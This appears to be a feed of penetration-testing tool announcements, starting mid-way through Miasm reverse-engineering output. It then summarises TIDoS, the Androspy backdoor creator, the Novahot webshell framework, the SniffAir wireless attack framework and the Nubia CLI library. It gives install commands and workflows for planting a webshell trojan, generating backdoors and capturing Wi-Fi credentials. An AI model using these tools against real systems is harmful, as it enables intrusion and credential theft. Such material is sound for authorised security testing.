0x4)[0:8] + 0xFF)[7:8]cf = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]EBX = EBX + 0x1________________________________________________________________________________Instr LEA EBX, DWORD PTR [EBX + 0x1]Assignblk:EBX = EBX + 0x1________________________________________________________________________________af = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]EIP = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)pf = parity((ECX + 0x4)[0:8] + 0xFF)IRDst = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)zf = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)ECX = 0x1of = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]nf = ((ECX + 0x4)[0:8] + 0xFF)[7:8]cf = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]EBX = EBX + 0x2________________________________________________________________________________Instr CMP CL, 0x1Assignblk:zf = (ECX[0:8] + -0x1)?(0x0,0x1)nf = (ECX[0:8] + -0x1)[7:8]pf = parity((ECX[0:8] + -0x1) & 0xFF)of = ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1))[7:8]cf = (((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1)) ^ ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1)))[7:8]af = ((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1))[4:5]________________________________________________________________________________af = 0x0EIP = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)pf = 0x1IRDst = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)zf = 0x1ECX = 0x1of = 0x0nf = 0x0cf = 0x0EBX = EBX + 0x2________________________________________________________________________________Instr JZ loc_key_1Assignblk:IRDst = zf?(loc_key_1,loc_key_2)EIP = zf?(loc_key_1,loc_key_2)________________________________________________________________________________af = 0x0EIP = 0x10pf = 0x1IRDst = 0x10zf = 0x1ECX = 0x1of = 0x0nf = 0x0cf = 0x0EBX = EBX + 0x2________________________________________________________________________________Instr LEA EBX, DWORD PTR [EBX + 0x1]Assignblk:EBX = EBX + 0x1________________________________________________________________________________af = 0x0EIP = 0x10pf = 0x1IRDst = 0x10zf = 0x1ECX = 0x1of = 0x0nf = 0x0cf = 0x0EBX = EBX + 0x3________________________________________________________________________________Instr LEA EBX, DWORD PTR [EBX + 0x1]Assignblk:IRDst = loc_key_3________________________________________________________________________________af = 0x0EIP = 0x10pf = 0x1IRDst = 0x13zf = 0x1ECX = 0x1of = 0x0nf = 0x0cf = 0x0EBX = EBX + 0x3________________________________________________________________________________Instr MOV EAX, EBXAssignblk:EAX = EBX________________________________________________________________________________af = 0x0EIP = 0x10pf = 0x1IRDst = 0x13zf = 0x1ECX = 0x1of = 0x0nf = 0x0cf = 0x0EBX = EBX + 0x3EAX = EBX + 0x3________________________________________________________________________________Instr RETAssignblk:IRDst = @32[ESP[0:32]]ESP = {ESP[0:32] + 0x4 0 32}EIP = @32[ESP[0:32]]________________________________________________________________________________af = 0x0EIP = @32[ESP]pf = 0x1IRDst = @32[ESP]zf = 0x1ECX = 0x1of = 0x0nf = 0x0cf = 0x0EBX = EBX + 0x3ESP = ESP + 0x4EAX = EBX + 0x3________________________________________________________________________________>>>How does it work?Miasm embeds its own disassembler, intermediate language and instruction semantic. It is written in Python.To emulate code, it uses LLVM, GCC, Clang or Python to JIT the intermediate representation. It can emulate shellcodes and all or parts of binaries. Python callbacks can be executed to interact with the execution, for instance to emulate library functions effects.DocumentationTODOAn auto-generated documentation is available here.Obtaining MiasmClone the repository: Miasm on GitHubGet one of the Docker images at Docker HubSoftware requirementsMiasm uses:python-pyparsingpython-develfesteem from Elfesteemoptionally python-pycparser (version >= 2.17)To enable code JIT, one of the following module is mandatory:GCCClangLLVM with Numba llvmlite, see below’optional’ Miasm can also use:Z3, the Theorem ProverConfigurationInstall elfesteemgit clone https://github.com/serpilliere/elfesteem.git elfesteemcd elfesteempython setup.py buildsudo python setup.py installTo use the jitter, GCC or LLVM is recommendedGCC (any version)Clang (any version)LLVMDebian (testing/unstable): Not testedDebian stable/Ubuntu/Kali/whatever: pip install llvmlite or install from llvmliteWindows: Not testedBuild and install Miasm:$ cd miasm_directory$ python setup.py build$ sudo python setup.py installIf something goes wrong during one of the jitter modules compilation, Miasm will skip the error and disable the corresponding module (see the compilation output).Windows & IDAMost of Miasm’s IDA plugins use a subset of Miasm functionnality. A quick way to have them working is to add:elfesteem directory and pyparsing.py to C:\…\IDA\python\ or pip install pyparsing elfesteemmiasm2/miasm2 directory to C:\…\IDA\python\All features excepting JITter related ones will be available. For a more complete installation, please refer to above paragraphs.TestingMiasm comes with a set of regression tests. To run all of them:cd miasm_directory/testpython test_all.pySome options can be specified:Mono threading: -mCode coverage instrumentation: -cOnly fast tests: -t long (excludes the long tests)They already use MiasmToolsSibyl: A function divination tooR2M2: Use miasm2 as a radare2 pluginCGrex : Targeted patcher for CGC binariesethRE Reversing tool for Ethereum EVM (with corresponding Miasm2 architecture)Blog posts / papers / conferencesDeobfuscation: recovering an OLLVM-protected programTaming a Wild Nanomite-protected MIPS Binary With Symbolic Execution: No Such CrackmeGénération rapide de DGA avec Miasm: Quick computation of DGA (French article)Enabling Client-Side Crash-Resistance to Overcome Diversification and Information Hiding: Detect undirected call potential argumentsMiasm: Framework de reverse engineering (French)Tutorial miasm (French video)Graphes de dépendances : Petit Poucet style: DepGraph (French)BooksPractical Reverse Engineering: X86, X64, Arm, Windows Kernel, Reversing Tools, and Obfuscation: Introduction to Miasm (Chapter 5 "Obfuscation")BlackHat Python – Appendix: Japan security book’s samplesMiscMan, does miasm has a link with rr0d?Yes! crappy code and uggly documentation.Download Miasm

Link: http://feedproxy.google.com/~r/PentestTools/~3/Cx6IGqWfrzI/miasm-reverse-engineering-framework-in.html

TIDoS-Framework v1.7 – The Offensive Manual Web Application Penetration Testing Framework

TIDoS Framework is a comprehensive web-app audit framework. let’s keep this simpleHighlights :-The main highlights of this framework is:TIDoS Framework now boasts of a century+ of modules.A complete versatile framework to cover up everything from Reconnaissance to Vulnerability Analysis.Has 5 main phases, subdivided into 14 sub-phases consisting a total of 104 modules.Reconnaissance Phase has 48 modules of its own (including active and passive recon, information disclosure modules).Scanning & Enumeration Phase has got 15 modules (including port scans, WAF analysis, etc)Vulnerability Analysis Phase has 36 modules (including most common vulnerabilites in action).Exploits Castle has only 1 exploit. (purely developmental)And finally, Auxillaries have got 4 modules. under dev.All four phases each have a Auto-Awesome module which automates every module for you.You just need the domain, and leave everything is to this tool.TIDoS has full verbose out support, so you’ll know whats going on.Fully user friendly interaction environment. (no shits)Installation :Clone the repository locally and navigate there:git clone https://github.com/theinfecteddrake/tidos-framework.gitcd tidos-frameworkInstall the dependencies:chmod +x install./installThats it! Now you are good to go! Now lets run the tool:tidosGetting Started :-TIDoS is made to be comprehensive and versatile. It is a highly flexible framework where you just have to select and use modules.But before that, you need to set your own API KEYS for various OSINT purposes. To do so, open up API_KEYS.py under files/ directory and set your own keys and access tokens for SHODAN, CENSYS, FULL CONTACT, GOOGLE and WHATCMS. Public API KEYS and ACCESS TOKENS for SHODAN and WHATCMS have been provided with the TIDoS release itself. You can still add your own… no harm!Finally, as the framework opens up, enter the website name eg. http://www.example.com and let TIDoS lead you. Thats it! Its as easy as that.Recommended: Follow the order of the tool (Run in a schematic way). Reconnaissance ➣ Scanning & Enumeration ➣ Vulnerability Analysis To update this tool, use tidos_updater.py module under tools/ folder.Flawless Features :-TIDoS Framework presently supports the following: and is under active development Reconnaissance + OSINT Passive Reconnaissance: Nping Enumeration Via external APiWhoIS Lookup Domain info gatheringGeoIP Lookup Pinpoint physical locationDNS Configuration Lookup DNSDumpSubdomains Lookup Indexed onesReverse DNS Lookup Host InstancesReverse IP Lookup Hosts on same serverSubnets Enumeration Class BasedDomain IP History IP InstancesWeb Links Gatherer Indexed onesGoogle Search Manual searchGoogle Dorking (multiple modules) AutomatedEmail to Domain Resolver Email WhoIsWayback Machine Lookups Find BackupsBreached Email Check Pwned Email AccountsEnumeration via Google Groups Emails OnlyCheck Alias Availability Social NetworksFind PasteBin Posts Domain BasedLinkedIn Gathering Employees & CompanyGoogle Plus Gathering Domain ProfilesPublic Contact Info Scraping FULL CONTACTCensys Intel Gathering Domain BasedThreat Intelligence Gathering Bad IPsActive Reconnaissance Ping Enumeration AdvancedCMS Detection (185+ CMSs supported) IMPROVEDAdvanced Traceroute IMPROVEDrobots.txt and sitemap.xml CheckerGrab HTTP Headers Live CaptureFind HTTP Methods Allowed via OPTIONSDetect Server Type IMPROVEDExamine SSL Certificate AbsoluteApache Status Disclosure Checks File BasedWebDAV HTTP Enumeration PROFIND & SEARCHPHPInfo File Enumeration via BruteforceComments Scraper Regex BasedFind Shared DNS Hosts Name Server BasedAlternate Sites Discovery User-Agent BasedDiscover Interesting Files via Bruteforce Common Backdoor Locations shells, etc.Common Backup Locations .bak, .db, etc.Common Password Locations .pgp, .skr, etc.Common Proxy Path Configs. .pac, etc.Common Dot Files .htaccess, .apache, etcInformation Disclosure Credit Cards Disclosure If PlaintextEmail Harvester IMPROVEDFatal Errors Enumeration Includes Full Path DisclosureInternal IP Disclosure Signature BasedPhone Number Havester Signature BasedSocial Security Number Harvester US Ones Scanning & Enumeration Remote Server WAF Enumeration Generic 54 WAFsPort Scanning Ingenious Modules Simple Port Scanner via Socket ConnectionsTCP SYN Scan Highly reliableTCP Connect Scan Highly ReliableXMAS Flag Scan Reliable Only in LANsFin Flag Scan Reliable Only in LANsPort Service DetectorWeb Technology Enumeration AbsoluteOperating System Fingerprinting IMPROVEDBanner Grabbing of Services via Open PortsInteractive Scanning with NMap 16 preloaded modulesEnumeration Domain-Linked IPs Using CENSYS DatabaseWeb and Links CrawlersDepth 1 Indexed Uri CrawlerDepth 2 Single Page CrawlerDepth 3 Web Link Crawler Vulnerability Analysis Web-Bugs & Server Misconfigurations Insecure CORS AbsoluteSame-Site Scripting Sub-domain basedZone Transfer DNS Server basedClickjackingFrame-Busting ChecksX-FRAME-OPTIONS Header ChecksSecurity on CookiesHTTPOnly FlagSecure FlagCloudflare Misconfiguration CheckDNS Misconfiguration ChecksOnline Database Lookup For BreachesHTTP Strict Transport Security UsageHTTPS Enabled but no HSTSDomain Based Email SpoofingMissing SPF RecordsMissing DMARC RecordsHost Header InjectionPort Based Over HTTP 80X-Forwarded-For Header InjectionSecurity Headers Analysis Live CaptureCross-Site Tracing HTTP TRACE MethodSession Fixation via Cookie InjectionNetwork Security Misconfig.Checks for TELNET Enabled via Port 23Serious Web Vulnerabilities File InclusionsLocal File Inclusion (LFI) Param basedRemote File Inclusion (RFI) IMPROVED Parameter BasedPre-loaded Path BasedOS Command Injection Linux & Windows (RCE)Path Traversal (Sensitive Paths)Cross-Site Request Forgery AbsoluteSQL InjectionError Based InjectionCookie Value BasedReferer Value BasedUser-Agent Value BasedAuto-gathering IMPROVEDBlind Based Injection Crafted Payloads Cookie Value BasedReferer Value BasedUser-Agent Value BasedAuto-gathering IMPROVEDLDAP Injection Parameter BasedHTML Injection Parameter BasedBash Command Injection ShellShockXPATH Injection Parameter BasedCross-Site Scripting IMPROVED Cookie Value BasedReferer Value BasedUser-Agent Value BasedParameter Value Based ManualUnvalidated URL Forwards Open RedirectPHP Code Injection Windows + LinuxHTTP Response Splitting CRLF Injection User-Agent Value BasedParameter value Based ManualSub-domain Takeover 50+ Services Single Sub-domain ManualAll Subdomains AutomatedOther PlainText Protocol Default Credential Bruteforce FTP Protocol BruteforceSSH Protocol BruteforcePOP 2/3 Protocol BruteforceSQL Protocol BruteforceXMPP Protocol BruteforceSMTP Protocol BruteforceTELNET Protocol Bruteforce Auxillary Modules Hash Generator MD5, SHA1, SHA256, SHA512String & Payload Encoder 7 CategoriesForensic Image Analysis Metadata ExtractionWeb HoneyPot Probability ShodanLabs HoneyScore Exploitation purely developmental ShellShockOther Tools:net_info.py – Displays information about your network. Located under tools/.tidos_updater.py – Updates the framework to the latest release via signature matching. Located under `tools/’.TIDoS In Action:Version:v1.7 [latest release] [#stable]Upcoming:These are some modules which I have thought of adding:Some more of Enumeraton & Information Disclosure modules.Lots more of OSINT & Stuff (let that be a suspense).More of Auxillary Modules.Some Exploits are too being worked on.Ongoing:Working on a full-featured Web UI implementation on Flask and MongoDB and Node.js.Working on a new framework, a real framework. To be released with v2Working on a campaign feature + addition of arguments.Normal Bug Fixing Stuffs. As per the issues being raisedSome other perks:Working on a way for contributing new modules easily.A complete new method of multi-threaded fuzzing of parameters.Keeping better of new console stuff.Download TIDoS-Framework

Link: http://www.kitploit.com/2018/11/tidos-framework-v17-offensive-manual.html

Androspy – Backdoor Crypter & Creator With Automatic IP Poisener

Androspy : is Backdoor Crypter & Creator with Automatic IP Poisener Coded By Belahsan OuerghiDependencieskeytooljarsignerApache2Metasploit-FrameworkxtermInstallationsudo apt-get install gitgit clone https://github.com/TunisianEagles/Androspy.gitcd Androspychmod +x setup.shsudo ./setup.shchmod +x androspy.shsudo ./androspy.shTested on :BackBox LinuxKali linuxParrot osContactContact – Tunisian Eagles[Email] – tunisianeagles@protonmail.com – TunisianEaglesWebsite – TunisianEaglesDownload Androspy

Link: http://feedproxy.google.com/~r/PentestTools/~3/8EjIvxwgg_w/androspy-backdoor-crypter-creator-with.html

Novahot – A Webshell Framework For Penetration Testers

novahot is a webshell framework for penetration testers. It implements a JSON-based API that can communicate with trojans written in any language. By default, it ships with trojans written in PHP, ruby, and python.Beyond executing system commands, novahot is able to emulate interactive terminals, including mysql, sqlite3, and psql. It additionally implements “virtual commands" that make it possible to upload, download, edit, and view remote files locallly using your preferred applications.InstallationInstall the executable directly from npm:[sudo] npm install -g novahotThen seed a config file:novahot config > ~/.novahotrcUsageView the available trojans with novahot trojan list. Select a trojan in a language that is appropriate for your target, then copy its source to a new file. (Ex: novahot trojan view basic.php > ~/my-trojan.php) Change the control password in the newly-created trojan. Upload the trojan to a web-accessible location on the target. Configure target information in the targets property in ~/.novahotrc. Run novahot shell to open a shell. Shell ModesInternally, novahot uses "modes" and "adapters" to emulate various interactive clients, currently including the mysql, psql (postgres), and sqlite3 clients.To change novahot’s mode, issue the appropriate "dot command":.mysql { "username" : "mysql-user", "password" : "the-password", "database" : "the-database" }(Connection parameters may be specified as JSON while changing modes, or alternatively saved as target configuration data in ~/.novahotrc.)For example, the mysql mode makes it possible to directly run queries like the following:mysql> SELECT ID, user_login, user_email, user_pass FROM wp_users;There additionally exists a payload mode that can be used to POST arbitrary data to the trojan. See the wiki for more information.Virtual Commandsnovahot implements four "virtual commands" that utilize payloads built in to the trojans to extend the functionality of the shell:downloaddownload <remote-filename> [<local-filename>]Downloads <remote-filename> to –download-dir, and optionally renames it to <local-filename> if specified.uploadupload <local-filename> [<remote-filename>]Uploads <local-filename> to the shell’s cwd, and optionally renames <local-filename> to <remote-filename> if specified.viewview <remote-filename> [<local-filename>]Downloads <remote-filename> to –download-dir, and optionally renames it to <local-filename> After downloading, the file will be opened by the "viewer" application specified in the configs.editedit <remote-filename>Downloads <remote-filename> to a temporary file, and then opens that file for editing using the "editor" specified in the configs. Afterward, if changes to the file are saved locally, the file will be re-uploaded to the server automatically.Provisioning a Test EnvironmentThis repository contains a laboratory environment built on Vagrant, Docker, and the Damn Vulnerable Web Application ("DVWA"). Steps for provisioning the environment vary depending on the capabilities of your physical host.Using docker-composeIf you have docker and docker-compose installed on your physical host, you may simply do the following:Clone and cd to this repositoryRun: docker-compose upAfter the docker container starts, the DVWA will be accessible at http://localhost:80.Using vagrantIf docker is not installed on your physical host, you may use Vagrant/Virtualbox to access a docker-capable virtual-machine:Clone and cd to this repositoryProvision a virtual machine: vagrant upSSH into the virtual machine: vagrant sshStart the docker container: sudo su; cd /vagrant; docker-compose upThe DVWA will be accessible at http://localhost:8000.Configuring novahot against the laboratory environmentSpecify the following connection strings in your ~/.novahotrc file to connect the novahot client to the PHP trojan embedded in the DVWA container:{ "targets": { "dvwa" : { "uri" : "http://localhost:8000/novahot.php", "password" : "the-password", "mysql" : { "username": "root", "password": "vulnerables", "database": "dvwa" } } }}You may then establish a webshell via:novahot shell dvwaAdditional InformationAdditional information can be found in the wiki:ConfigurationThe Client/Trojan APIsqlite3 "dot command" conflictsDownload Novahot

Link: http://www.kitploit.com/2018/11/novahot-webshell-framework-for.html

SniffAir – A Framework For Wireless Pentesting

SniffAir is an open-source wireless security framework which provides the ability to easily parse passively collected wireless data as well as launch sophisticated wireless attacks. SniffAir takes care of the hassle associated with managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic, looking for potential security flaws. Along with the prebuilt queries, SniffAir allows users to create custom queries for analyzing the wireless data stored in the backend SQL database. SniffAir is built on the concept of using these queries to extract data for wireless penetration test reports. The data can also be leveraged in setting up sophisticated wireless attacks included in SniffAir as modules.SniffAir is developed by @Tyl0us and @theDarracottInstallSniffAir was developed with Python version 2.7Tested and supported on Kali Linux, Debian and Ubuntu.To install run the setup.sh script$./setup.shUsage % * ., % % ( ,# (..# % /@@@@@&, *@@% &@, @@# /@@@@@@@@@ .@@@@@@@@@. ,/ # # (%%%* % (.(. .@@ &@@@@@@%. .@@& *&@ %@@@@. &@, @@% %@@,,,,,,, ,@@,,,,,,, .( % % %%# # % # ,@@ @@(,,,#@@@. %@% %@@(@@. &@, @@% %@@ ,@@ /* # /*, %.,, ,@@ @@* #@@ ,@@& %@@ ,@@* &@, @@% %@@ ,@@ .# //#(, (, ,@@ @@* &@% .@@@@@. %@@ .@@( &@, @@% %@@%%%%%%* ,@@%%%%%%# (# ##. ,@@ @@&%%%@@@% *@@@@ %@@ .@@/ &@, @@% %@@,,,,,, ,@@,,,,,,. %#####% ,@@ @@(,,%@@% @@% %@@ @@( &@, @@% %@@ ,@@ % (*/ # ,@@ @@* @@@ %@% %@@ @@&&@, @@% %@@ ,@@ % # .# .# ,@@ @@* @@% .@@&/,,#@@@ %@@ &@@@, @@% %@@ ,@@ /(* /(# ,@@ @@* @@# *%@@@&* *%# ,%# #%/ *%# %% #############. .%# #%. .%% (@Tyl0us & @theDarracott) >> [default]# helpCommands========workspace Manages workspaces (create, list, load, delete)live_capture Initiates a valid wireless interface to collect wireless pakcets to be parsed (requires the interface name)offline_capture Begins parsing wireless packets using a pcap file-kismet .pcapdump work best (requires the full path)offline_capture_list Begins parsing wireless packets using a list of pcap file-kismet .pcapdump work best (requires the full path)query Executes a query on the contents of the acitve workspacehelp Displays this help menuclear Clears the screenshow Shows the contents of a table, specific information across all tables or the available modulesinscope Add ESSID to scope. inscope [ESSID]SSID_Info Displays all information (i.e all BSSID, Channels and Encrpytion) related to the inscope SSIDSuse Use a SniffAir moduleinfo Displays all variable information regarding the selected moduleset Sets a variable in moduleexploit Runs the loaded modulerun Runs the loaded moduleexit Exit SniffAir >> [default]# BeginFirst create or load a new or existing workspace using the command workspace create or workspace load <workspace> command. To view all existing workspaces use the workspace list command and workspace delete <workspace> command to delete the desired workspace: >> [default]# workspace Manages workspaces Command Option: workspaces [create|list|load|delete]>> [default]# workspace create demo[+] Workspace demo createdLoad data into a desired workplace from a pcap file using the command offline_capture <the full path to the pcap file>. To load a series of pcap files use the command offline_capture_list <the full path to the file containing the list of pcap name> (this file should contain the full patches to each pcap file). Use the live_capture <interface name> command to capture live wireless traffic using a wireless interface.>> [demo]# offline_capture /root/sniffair/demo.pcapdump[+] Importing /root/sniffair/demo.pcapdump\[+] Completed[+] Cleaning Up Duplicates[+] ESSIDs ObservedShow CommandThe show command displays the contents of a table, specific information across all tables or the available modules, using the following syntax: >> [demo]# show table AP+——+———–+——————-+——————————-+——–+——-+——-+———-+——–+| ID | ESSID | BSSID | VENDOR | CHAN | PWR | ENC | CIPHER | AUTH ||——+———–+——————-+——————————-+——–+——-+——-+———-+——–|| 1 | HoneyPot | c4:6e:1f:##:##:## | TP-LINK TECHNOLOGIES CO. LTD. | 4 | -17 | WPA2 | TKIP | MGT || 2 | Demo | 80:2a:a8:##:##:## | Ubiquiti Networks Inc. | 11 | -19 | WPA2 | CCMP | PSK || 3 | Demo5ghz | 82:2a:a8:##:##:## | Unknown | 36 | -27 | WPA2 | CCMP | PSK || 4 | HoneyPot1 | c4:6e:1f:##:##:## | TP-LINK TECHNOLOGIES CO. LTD. | 36 | -29 | WPA2 | TKIP | PSK || 5 | BELL456 | 44:e9:dd:##:##:## | Sagemcom Broadband SAS | 6 | -73 | WPA2 | CCMP | PSK |+——+———–+——————-+——————————-+——–+——-+——-+———-+——–+ >> [demo]# show SSIDS———HoneyPotDemoHoneyPot1BELL456HiddenDemo5ghz———The query command can be used to display a unique set of data based on the parememters specificed. The query command uses sql syntax.Inscopethe inscope <SSID> command can be used to add a SSID to the inscope tables, loading all related data to the inscope_AP, inscope_proberequests and inscope_proberesponses tables. To view a summary of all inscope SSIDS run the SSID_Info command.ModulesModules can be used to analyze the data contained in the workspaces or perform offensive wireless attacks using the use <module name> command. For some modules additional variables may need to be set. They can be set using the set command set <variable name> <variable value>: >> [demo]# show modulesAvailable Modules=================[+] Auto EAP – Automated Brute-Force Login Attack Against EAP Networks[+] Auto PSK – Automated Brute-Force Passphrase Attack Against PSK Networks[+] AP Hunter – Discover Access Point Within a Certain Range Using a Specific Type of Encrpytion[+] Captive Portal – Web Based Login Portal to Capture User Entered Credentials (Runs as an OPEN Network)[+] Certificate Generator – Generates a Certificate Used by Evil Twin Attacks[+] Exporter – Exports Data Stored in a Workspace to a CSV File[+] Evil Twin – Creates a Fake Access Point, Clients Connect to Divulging MSCHAP Hashes or Cleartext Passwords[+] Handshaker – Parses Database or .pcapdump Files Extracting the Pre-Shared Handshake for Password Guessing (Hashcat or JTR Format)[+] Mac Changer – Changes The Mac Address of an Interface[+] Probe Packet – Sends Out Deauth Packets Targeting SSID(s)[+] Proof Packet – Parses Database or .pcapdump Files Extracting all Packets Related to the Inscope SSDIS[+] Hidden SSID – Discovers the Names of HIDDEN SSIDS[+] Suspicious AP – Looks for Access Points that: Is On Different Channel, use a Different Vendor or Encrpytion Type Then the Rest of The Network[+] Wigle Search SSID – Queries wigle for SSID (i.e. Bob’s wifi)[+] Wigle Search MAC – Queries wigle for all observations of a single mac address >> [demo]# >> [demo]# use Captive Portal >> [demo][Captive Portal]# infoGlobally Set Varibles===================== Module: Captive Portal Interface: SSID: Channel: Template: Cisco (More to be added soon) >> [demo][Captive Portal]# set Interface wlan0 >> [demo][Captive Portal]# set SSID demo >> [demo][Captive Portal]# set Channel 1 >> [demo][Captive Portal]# infoGlobally Set Varibles===================== Module: Captive Portal Interface: wlan0 SSID: demo Channel: 1 Template: Cisco (More to be added soon) >> [demo][Captive Portal]# Once all varibles are set, then execute the exploit or run command to run the desired attack.ExportTo export all information stored in a workspace’s tables using the Exporter module and setting the desired path.AcknowledgmentsSniffiar contains work from the following repoisoties:hostapd-wpejmalinen/hostaplootbootyDownload SniffAir

Link: http://feedproxy.google.com/~r/PentestTools/~3/MbOna5CFG4s/sniffair-framework-for-wireless.html

Python-Nubia – A Command-Line And Interactive Shell Framework

Nubia is a lightweight framework for building command-line applications with Python. It was originally designed for the “logdevice interactive shell (aka. ldshell)” at Facebook. Since then it was factored out to be a reusable component and several internal Facebook projects now rely on it as a quick and easy way to get an intuitive shell/cli application without too much boilerplate.Nubia is built on top of python-prompt-toolkit which is a fantastic toolkit for building interactive command-line applications.Disclaimer: Nubia is beta for non-ldshell use-cases. Some of the design decisions might sound odd but they fit the ldshell usecase perfectly. We are continuously making changes to make it more consistent and generic outside of the ldshell use-case. Until a fully stable release is published, use it on your own risk.See the CONTRIBUTING file for how to help out.If you are curious on the origins of the name, checkout Nubia on Wikipedia with its unique and colourful architecture.Key FeaturesInteractive mode that offers fish-style auto-completionCLI mode that gets generated from your functions and classes.Optional bash/zsh completions via an external utility ‘nubia-complete’ (experimental)A customisable status-bar in interactive mode.An optional IPython-based interactive shellArguments with underscores are automatically hyphenatedPython3 type annotations are used for input type validationInteractive modeThe interactive mode in Nubia is what makes it unique. It is very easy to build a unique shell for your program with zero overhead. The interactive shell in its simplistic form offers automatic completions for commands, sub-commands, arguments, and values. It also offers a great deal of control for developers to take control over auto-completions, even for commands that do not fall under the typical format. An example is the “select” command in ldshell which is expressed as a SQL-query. We expect that most use cases of Nubia will not need such control and the AutoCommand will be enough without further customisation.If you start a nubia-based program without a command, it automatically starts an interactive shell. The interactive mode looks like this:Non-interactive modeThe CLI mode works exactly like any traditional unix-based command line utility. ExamplesIt starts with a function like this:import socketimport typingfrom termcolor import cprintfrom nubia import argument, command, context@command@argument(“hosts", description="Hostnames to resolve", aliases=["i"])@argument("bad_name", name="nice", description="testing")def lookup(hosts: typing.List[str], bad_name: int): """ This will lookup the hostnames and print the corresponding IP addresses """ ctx = context.get_context() print(f"hosts: {hosts}") cprint(f"Verbose? {ctx.verbose}") for host in hosts: cprint(f"{host} is {socket.gethostbyname(host)}") # optional, by default it’s 0 return 0RequirementsNubia-based applications require python 3.6+ and works with both Mac OS X or Linux. While in theory it should work on Windows, it has never been tried.Installing NubiaIf you are installing nubia for your next project, you should be able to easily use pip for that:pip3 install python-nubiaBuilding Nubia from sourceEnsure is pipenv installed:pip3 install pipenvYou can either setup.py to build a tarball, or use pipenv to setup a virtualenv with all the dependencies installed.Running example in virtualenv:If you would like to run the example, then you need to add the root of the source tree into your PYTHONPATH.pipenv update –devpipenv shellexport PYTHONPATH="$(pwd)"cd example/python nubia_example.pyTo run the unit tests:pipenv run nosetestsGetting StartedSee the getting started guide to learn how to build a simple application with Nubia.Download Python-Nubia

Link: http://feedproxy.google.com/~r/PentestTools/~3/-w_cjQ_08MQ/python-nubia-command-line-and.html